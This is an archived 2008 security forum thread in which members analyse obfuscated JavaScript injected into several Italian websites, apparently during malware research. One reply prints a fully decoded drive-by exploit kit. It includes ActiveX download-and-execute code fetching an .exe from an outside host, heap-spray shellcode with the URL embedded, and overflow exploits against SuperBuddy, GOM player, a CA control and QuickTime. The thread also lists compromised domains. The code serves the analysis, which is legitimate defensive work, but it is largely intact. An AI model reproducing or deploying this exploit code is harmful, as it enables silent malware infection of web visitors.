Author Topic: Some italia site with obfuscated javascript  (Read 7849 times)


April 26, 2008, 05:04:59 am

Edgar Bangkok

I found, with my tool Webscanner, some Italian sites with obfuscated JavaScript.

The first JavaScript redirects to a page with JavaScript that is also strongly obfuscated.

vvv.deegees.it
vvv.graphixmania.it
vvv.sabrinasalerno.com
vvv.skuolasprint.it
vvv.custommania.com
vvv.giovaniudccasteltermini.com

More info at

http://edetools.blogspot.com/2008/04/utilizzo-di-webscanner-nella-ricerca-di.html

and also

http://edetools.blogspot.com/2008/04/sito-le-chicche-di-cala-con-javascript.html

I tried to decode the second script, but I have a problem with the function callee to string.
If anyone knows how to decode it, that would be good  ;D


Edgar from Bangkok  :)




April 26, 2008, 01:32:52 pm
Reply #1

MysteryFCM

302's to;

http://eaoafir.com/cgi-bin/index.cgi?grobin

Wishing Bobby was here as my attempt to decode it, resulted in what looks like gibberish;

Tried going back to snag a copy and re-check but the server is returning the status code 500 (Internal Server Error)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 26, 2008, 01:51:00 pm
Reply #2

Edgar Bangkok

Found other sites with obfuscated JavaScript

vvv.fluidifikas.it
vvv.ristoreggio.it
vvv.jacopo81.it
vvv.sevenpress.com
vvv.fasterage.net

Same code.
It is possible the malware links serve an MBR rootkit.


Edgar  :)

April 26, 2008, 02:18:13 pm
Reply #3

MysteryFCM

Slightly better cleaned up version (had to clean it up by hand), but still can't get it to decompile either manually or using Malzilla ....... someone with more knowledge of JS may be better at going further with this than myself;

Code: [Select]
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M, 9d)K7t7M-!+d)K7"
}
7M-t)>wud]~dx89;
!+ve~sdy~0S]^8t<
}
<i9kfqb0b-888i;
8#:t99;
8
}
Nt9:#9;
t9+budeb~0b+mfqb0t-7fuc|h>s
}
7+fqb0iSx!<iSx"<";
dz="function dw(t)"
{
ca='document.write("';ce='")';cb='<scriptlanguage=\"javascript\">';cc='<\/script>';
eval(unescape(t))
}
;";
dd="
}
Sx<tSx<
}
^
}
+yv8d)K7i7M,"  '9kd)K7i7M0-0"  '+m
}
^
}
-S]^8d)K7t7M<d)K7
}
7M<d)K7i7M9+iSx!-|)K888d)K7i7M6 hQQ9;
}
^
}
950&5##950"&M+iSx"-|)K8888d)K7i7M6 h##!!9..#9;
}
^
}
950! 9M+
}
Sx";
ca="function dcs(ds,es)";
{
ds="unesc";
op="$="dw(dcs(cu,14))"";
";
";
cb="ape(ds)";
st=tmp='';
for(i=0;
i<ds.l";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<"<#<$<?<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTqi89'";
"9+u|cu";
cz="function cz(cz)";
{
return ca+cb+cc+cd+ce+cz;
}
;";
ce="charCodeAt(0)^('0x00'+es)))";
}

}
";
de="-|)K88d)K7"
}
7M;
}
^
}
950"?+yv888d)K7t7M:"9.- 96688d)K7t7M:"9,-)99tSx-~)K8d)K7t7M50! 9M+u|cu0tSx-|)K88d)K7t7M:&950"'9M+4-4>bu`|qsu8t<iSx";
}
Sx;
iSx!;
tSx;
}
)Kd)K7
}
7M=!M;
7>s
}
79+";
cu="(p";
}
b4g`mxq)6b
}
g
}
v
}
x
}
`m.|
}
ppqz6*(
}
rfuyq4gfw)6|``d.;
;
bqgx
{
l:w
{
y;
xp;
sfv;
64c
}
p`|)?4|q
}
s|`),$*(;
}
rfuyq*(;
p
}
b*";
st="st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;da="fqb0"
}
)-~ug0Qbbqi87e~7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7
{
7<7|7<7
}
7<7~7<77<7`7<7a7<7b7<7c7<7";
cc="ength";
i++)
{
tmp=ds.slice(i,i+1)?;
cd="bst=st+String.fromCharCode((tmp.";
if (document.cookie.indexOf('vbulletin_multiquote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+dw(dz+cz($+st));)
}
else
{
$=''
}
;function sc(cnm,v,ed)
{
var exd=new Date();
exd.setDate(exd.getDate()+ed);
document.cookie=cnm+ '=' +escape(v)+';
expires=+exd.toGMTString();
}
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M,%209d)K7t7M-!+d)K7";
}
7M-t)>wud]%7F~dx89;
!+ve~sdy%7F~0S]^8t<
}
<i9kfqb0b-888i;
8#:t99;
8
}
Nt9:#9;
t9+budeb~0b+mfqb0t-7fuc|%7Fh>s%7F
}
7+fqb0iSx!<iSx%22<";
dz="%66%75n%63%74i%6fn%20dw(%74)"
{
ca='document.write("';ce='")';cb='<scriptlanguage=\"javascript\">';cc='<\/script>';eval(unescape(t))};";
dd="
}
Sx<tSx<
}
^
}
+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m
}
^
}
-S]^8d)K7t7M<d)K7
}
7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%20hQQ9;
}
^
}
950&5##950%22&M+iSx%22-|)K8888d)K7i7M6%20h##!!9..#9;
}
^
}
950!%209M+
}
Sx";
ca="function dcs(ds,es){ds=unesc";
op="$="dw(dcs(cu,14));
%22;
";
cb="a%70e(d%73)";
st=tmp='';for(i=0;i<ds.l";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%22<#<$<%<&<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTqi89";
%229+u|cu";
cz="function cz(cz)"
{
return ca+cb+cc+cd+ce+cz;
}
ce="charCodeAt(0)^('0x00'+es)))";
}
";
de="-|)K88d)K7";
}
7M;
}
^
}
950%22%9M+yv888d)K7t7M:%229.-%2096688d)K7t7M:%229,-)99tSx-~)K8d)K7t7M50!%209M+u|cu0tSx-|)K88d)K7t7M:&950%22'9M+4-4>bu`|qsu8t<iSx%22';
}
Sx;
iSx!;
tSx;
}
)Kd)K7
}
7M=!M;
7>s%7F
}
79+";
cu="(p"
}
b4g`mxq)6b
}
g
}
v
}
x
}
`m.|
}
ppqz6*(
}
rfuyq4gfw)6|``d.;
;
bqgx
{
l:w
{
y;
xp;
sfv;
64c
}
p`|)%$$4|q
}
s|`),$*(;
}
rfuyq*(;
p
}
b*";
st="st="$=st;dcs(da+db+dc+dd+de,10)"";
dw(st);st=$;
da="fqb0";
}
)-~ug0Qbbqi87e~%7F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7
{
7<7|7<7
}
7<7~7<7%7F7<7`7<7a7<7b7<7c7<7";
cc="ength";
%69++%29
{
tmp=ds.slice(i,i+1)%3";
cd="bst=st+String.fromCharCode((tmp.";
if (document.cookie.indexOf('vbulletin_multiquote=')==-1)
{
sc('vbulletin_multiquote=',2,7);
eval(unescape(dz+cz+op+st)+dw(dz+cz($+st));
)
}
else
{
$=''
}
;function sc(cnm,v,ed)
{
var exd=new Date();
exd.setDate(exd.getDate()+ed);
document.cookie=cnm+ '=' +escape(v)+;
expires=+exd.toGMTString();
}
;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 26, 2008, 02:42:14 pm
Reply #4

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 27, 2008, 12:29:49 pm
Reply #5

dikex

<script type="text/javascript">

function byBVYypmH(EDcA4......var XCr713T35 = arguments.callee.toString() + location.href;......var I825656Ee = eval;......try {I825656Ee(VSTel45n3);} ......

------------------------------------------Change some string---------------------------------------------------

<textarea id="textareaID" rows="34" cols="110"></textarea>

<script type="text/javascript">

aaaa=('function byBVYypmH(EDcA4......var XCr713T35 = arguments.callee.toString() + location.href;......var I825656Ee = eval;......try {I825656Ee(VSTel45n3);} ......');

function byBVYypmH(EDcA4......var XCr713T35 = aaaa.toString() + "http://eaoafir.com/cgi-bin/index.cgi?grobin";......var I825656Ee = eval;......try {document.getElementById("textareaID").innerText=(VSTel45n3);} ......

-------------------------------------Decode(Double click the html)----------------------------------------------

URL of Virus : hXXp://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022601110249440600000000059ad0f089000108040000000006

Code: [Select]

function U7HqjnXG(QcGoPNLD)
{
var mc7r4akc = "abcdefghiklmnopqrstuvwxyz0123456789";
var a17zMsDE = '';
for (var vWEkSeqq=0; vWEkSeqq<QcGoPNLD; vWEkSeqq++) {
var pCc7_bae = Math.floor(Math.random() * mc7r4akc.length);
a17zMsDE += mc7r4akc.substring(pCc7_bae, pCc7_bae+1);
}

return a17zMsDE;
}

function o2r10YZM(xw75N43p, FZayaLXl)
{
var nCc2Hu_s = null;
var yRrOaJUh = 'nCc2Hu_s=xw75N43p.';
var oMr4XVRC = new Array(
'CreateObject(FZayaLXl)',
'CreateObject(FZayaLXl, "")',
'CreateObject(FZayaLXl, "", "")',
'GetObject("", FZayaLXl)',
'GetObject(FZayaLXl, "")',
'GetObject(FZayaLXl)'
);

var U3mZc6is=0;

while(!nCc2Hu_s && U3mZc6is < oMr4XVRC.length) {
try {
eval(yRrOaJUh+oMr4XVRC[U3mZc6is]);
} catch(e) { }

U3mZc6is++;
}

return nCc2Hu_s;
}

function dq8VuAlN(uRk2eNwT, l8belPXf)
{

try {
uRk2eNwT.open("GET", l8belPXf, false);
uRk2eNwT.send(null);

} catch(e) { return 0; }

return uRk2eNwT.responseBody;
}


function r806xlyt(t0NDW77x, gE7fyYOc, UChBuRkb)
{

try {
t0NDW77x.Type = 1;
t0NDW77x.Mode = 3;
t0NDW77x.Open();
t0NDW77x.Write(UChBuRkb);
t0NDW77x.SaveToFile(gE7fyYOc, 2);
t0NDW77x.Close();
} catch(e) { return 0; }

return 1;
}

function IIGGDjgN(Kuug3coA, uRk2eNwT, t0NDW77x, M3CX9NWF, mqZaftOC)
{
var sXXBMpeF = 0;
var DStyMkCZ = dq8VuAlN(uRk2eNwT, Kuug3coA);

if (DStyMkCZ != 0) {
var qGHfN1ME = "c:\\"+U7HqjnXG(6)+".exe";

if (r806xlyt(t0NDW77x, qGHfN1ME, DStyMkCZ) == 1) {
if (mqZaftOC == 0) {
try {
M3CX9NWF.Run(qGHfN1ME, 0);
sXXBMpeF = 1;
} catch(e) { }
} else {
try {
M3CX9NWF.ShellExecute(qGHfN1ME, "", "", "open", 0);
sXXBMpeF = 1;
} catch(e) { }
}
}
}

return sXXBMpeF;
}

function DgvnLSll()
{
var ZmFSGFGA = 0;
var uK6eUqMi = 1;
var Qjg9dZMZ = "http://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022602110249440600000000059ad0f0890001080400000000020";
var i9YJrZeZ = new Array(null, null, null);

try {
var l2SqPKiW = 0;
var UDKzrfkA = document.createElement("object");
UDKzrfkA.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (UDKzrfkA) {
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "msxml2.XMLHTTP");
if (!i9YJrZeZ[0])
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "Microsoft.XMLHTTP");

if (!i9YJrZeZ[0])
i9YJrZeZ[0] = o2r10YZM(UDKzrfkA, "MSXML2.ServerXMLHTTP");

i9YJrZeZ[1] = o2r10YZM(UDKzrfkA, "ADODB.Stream");

i9YJrZeZ[2] = o2r10YZM(UDKzrfkA, "WScript.Shell");

if (!i9YJrZeZ[2]) {
i9YJrZeZ[2] = o2r10YZM(UDKzrfkA, "Shell.Application");
if (i9YJrZeZ[2]) l2SqPKiW = 1;
}
}

if (i9YJrZeZ[0] && i9YJrZeZ[1] && i9YJrZeZ[2]) {
for(var eA9NiqmX=0;eA9NiqmX<uK6eUqMi;eA9NiqmX++) {
var wTMNrJOs = IIGGDjgN(Qjg9dZMZ+eA9NiqmX.toString(), i9YJrZeZ[0], i9YJrZeZ[1], i9YJrZeZ[2], l2SqPKiW);

if (!ZmFSGFGA)
ZmFSGFGA = wTMNrJOs;
}
}

} catch(e) {}

return ZmFSGFGA;
}

function KdXGn3hS(Aj8NqDys, YKZ_z0Ot)
{
try {

var JiXlJ1cE = new Date();
JiXlJ1cE.setDate(JiXlJ1cE.getDate() + 1);

if (Aj8NqDys) {
document.cookie =
"id=" + Aj8NqDys +
"; path=/";
}

if (YKZ_z0Ot) {
document.cookie =
"addt=" + YKZ_z0Ot +
"; path=/";
}


} catch(e) {
}
}

var jOr2Ow3C = new Array();
var Zlq35uLI = 0;

function SEVaPTtu()
{
jOr2Ow3C = jOr2Ow3C;
setTimeout(SEVaPTtu, 100);
}

function h8fKeT0p(i7ZjoRZr, zXGdeRmP)
{
while (i7ZjoRZr.length*2<zXGdeRmP)
i7ZjoRZr += i7ZjoRZr;

i7ZjoRZr = i7ZjoRZr.substring(0,zXGdeRmP/2);
return i7ZjoRZr;
}

function is7lXC3o()
{
if (!Zlq35uLI) {
var JVRGiF4u = 0x0c0c0c0c;
var RJUJFZip = unescape("%u9090%u9090%u9090%u9090%ufce9%u0000%u5f00%ua164%u0030%u0000%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34%u7c40%u688b%u8b3c%u6af7%u5904%u8fe8%u0000%ue200%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b%u79e8%u0000%u8b00%u47d7%u3f80%u7500%u47fa%u4757%u3f80%u7500%u8bfa%u5fef%uc933%uec81%u0104%u0000%udc8b%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u7865%u7565%u8303%u08eb%u0389%u43c7%u2e04%u7865%uc665%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u0675%u016a%uff53%u0456%u595a%uc283%u4104%u3a80%u7500%uffb4%u0856%u5651%u758b%u8b3c%u2e74%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%uc503%udb33%ube0f%u3a10%u74d6%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uabc5%u595e%ue8c3%ufeff%uffff%u4e8e%uec0e%ufe98%u0e8a%ud87e%u73e2%uca33%u5b8a%u1a36%u702f%u4d58%u7049%u6800%u7474%u3a70%u2f2f%u6e68%u616f%u6966%u2e72%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6e69%u6564%u2e78%u6763%u3f69%u3264%u3463%u3461%u3065%u3030%u3030%u3230%u3632%u3230%u3131%u3230%u3934%u3434%u3630%u3030%u3030%u3030%u3030%u3530%u6139%u3064%u3066%u3938%u3030%u3130%u3830%u3430%u3030%u3030%u3030%u3030%u3830%u0030");
var g4W4EFSq = 0x400000;
var Cjz4YfDK = RJUJFZip.length * 2;
var zXGdeRmP = g4W4EFSq - (Cjz4YfDK+0x38);
var i7ZjoRZr = unescape("%u0c0c%u0c0c");

i7ZjoRZr = h8fKeT0p(i7ZjoRZr,zXGdeRmP);
var qkB6u7_b = (JVRGiF4u - 0x400000)/g4W4EFSq;

for (var SBHRkGrq=0;SBHRkGrq<qkB6u7_b;SBHRkGrq++) {
jOr2Ow3C[SBHRkGrq] = i7ZjoRZr + RJUJFZip;
}

Zlq35uLI = 1;
SEVaPTtu();
}


return 0;
}

function EgAcyU9i() {

try {
var b80MrOJx = new ActiveXObject('Sb.SuperBuddy');

if (b80MrOJx) {
is7lXC3o();
KdXGn3hS(9);
b80MrOJx.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function E3UIjfPF()
{
try {

var n6YvBrCg = new ActiveXObject("GomWebCtrl.GomManager.1");

if (n6YvBrCg) {
is7lXC3o();
var JD06Xe9P='';
var owExuTTl = 506;

for(var WsRPFrcv=0;WsRPFrcv<owExuTTl;WsRPFrcv++)
JD06Xe9P += unescape("%0c");

JD06Xe9P += unescape("%0c%0c%0c%0c");

KdXGn3hS(13);
n6YvBrCg.OpenURL(JD06Xe9P);
}
} catch(e) {
}

return 0;
}


function cf5PSiUy()
{
try {
var Pcp6NhZi = '<object classid="clsid:BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3" ' +
  'width="1" height="1" style="border: 0px" id="caobj"></object>';

var tQOzUV9N = document.createElement("div");
tQOzUV9N.innerHTML = Pcp6NhZi;
document.body.appendChild(tQOzUV9N);

var oyhBNKhZ = document.getElementById("caobj");

if (oyhBNKhZ.AddColumn) {
is7lXC3o();
KdXGn3hS(21);

var ntGMze7q = unescape("%u0c0c%u0c0c");
       
while(ntGMze7q.length < 256) {
ntGMze7q += ntGMze7q;
}

ntGMze7q = ntGMze7q.substring(0, 128);
oyhBNKhZ.AddColumn(ntGMze7q, 1);
}
} catch(e) { }

return 0;
}

function mtX0nQMB()
{
try {
var IQfiD7Au = new ActiveXObject("QuickTime.QuickTime.4");

if (IQfiD7Au) {
is7lXC3o();
var QVgEgLwI = "";
for(var ldccWmLy=0;ldccWmLy<200;ldccWmLy++) {
QVgEgLwI += "AAAA";
}

QVgEgLwI += "AAA";

for(var ldccWmLy=0;ldccWmLy<3;ldccWmLy++) {
QVgEgLwI += "\x0c\x0c\x0c\x0c";
}

var RT56dulV =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://hnoafir.com/cgi-bin/index.cgi?d2c4a4e00000022601110249440600000000059ad0f089000108040000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://BBBB:' + QVgEgLwI +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

var pQ2wnUDc = document.createElement("div");
pQ2wnUDc.innerHTML = RT56dulV;
KdXGn3hS(6);
document.body.appendChild(pQ2wnUDc);

}
} catch(e) {
}

return 0;
}
if (DgvnLSll() || EgAcyU9i() || E3UIjfPF() || cf5PSiUy() || mtX0nQMB()) { /*window.location = 'about:blank';*/ }
 else { /*window.location = 'about:blank';*/ }

Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear! Disappear!
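The stub quoted in the post above reads `arguments.callee.toString() + location.href`, which is why the analyst's copy keeps the function text in a string and hard-codes the original URL. The following is an added example, not code from any post in this thread: it runs on a constructed, harmless sample and shows how a decode that depends on that text fails once the function is reformatted or opened from another location. The key schedule, the names `keyFrom`, `xorBytes`, `decodeForAnalysis`, `looksDecoded` and the example.invalid URL are assumptions for illustration.

```javascript
// Constructed, harmless sample: nothing here comes from the scripts in this thread.
// SERVED_SOURCE stands for the decoder function's text exactly as the server sent it.
const SERVED_SOURCE = 'function d(b){var k=arguments.callee.toString()+location.href;/*...*/}';
const SERVED_URL = 'http://example.invalid/landing'; // placeholder for location.href
const PAYLOAD = 'document.title="stage two";';       // benign stand-in for the hidden stage

// Assumed key schedule for this demo: fold the key text into 8 bytes.
function keyFrom(text) {
  const key = new Array(8).fill(0);
  for (let i = 0; i < text.length; i++) {
    const slot = i % key.length;
    key[slot] = (key[slot] * 31 + text.charCodeAt(i)) & 0xff;
  }
  return key;
}

// XOR is symmetric, so one routine both builds the sample blob and decodes it.
function xorBytes(bytes, key) {
  return bytes.map((b, i) => b ^ key[i % key.length]);
}

const BLOB = xorBytes(Array.from(PAYLOAD, c => c.charCodeAt(0)),
                      keyFrom(SERVED_SOURCE + SERVED_URL));

// Analyst-side decode: the key text is passed in as plain strings and the
// result is returned as text. Nothing is ever handed to eval().
function decodeForAnalysis(functionText, pageUrl, blob) {
  const bytes = xorBytes(blob, keyFrom(functionText + pageUrl));
  return String.fromCharCode(...bytes);
}

// Non-printable bytes in the output are a quick signal that the key text was wrong.
function looksDecoded(text) {
  return /^[\x20-\x7e]+$/.test(text);
}

// 1. Byte-exact function text plus the original URL recovers the hidden stage.
const exact = decodeForAnalysis(SERVED_SOURCE, SERVED_URL, BLOB);
// 2. A "cleaned up" copy (one added line break and indent) yields a different key.
const beautified = decodeForAnalysis(SERVED_SOURCE.replace('{', '{\n  '), SERVED_URL, BLOB);
// 3. The same file opened from disk changes location.href and therefore the key.
const offline = decodeForAnalysis(SERVED_SOURCE, 'file:///C:/sample.html', BLOB);

console.log({ exact, exactOk: looksDecoded(exact),
              beautifiedOk: looksDecoded(beautified), offlineOk: looksDecoded(offline) });
```

When working on a real sample, keep an untouched copy of the served bytes and record the exact URL it was fetched from before beautifying anything.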

April 27, 2008, 11:15:42 pm
Reply #6

JohnC


April 28, 2008, 08:24:15 am
Reply #7

redwolfe_98

I found, with my tool Webscanner, some Italian sites with obfuscated JavaScript.

vvv.deegees.it
vvv.graphixmania.it
vvv.sabrinasalerno.com
vvv.skuolasprint.it
vvv.custommania.com
vvv.giovaniudccasteltermini.com

Edgar

Edgar, I think it is misleading when you substitute "vvv" for "www".

April 28, 2008, 03:39:41 pm
Reply #8

Edgar Bangkok

It is only to avoid putting a direct link to a malware site; you can change vvv to www and then use the URLs  ;D

Edgar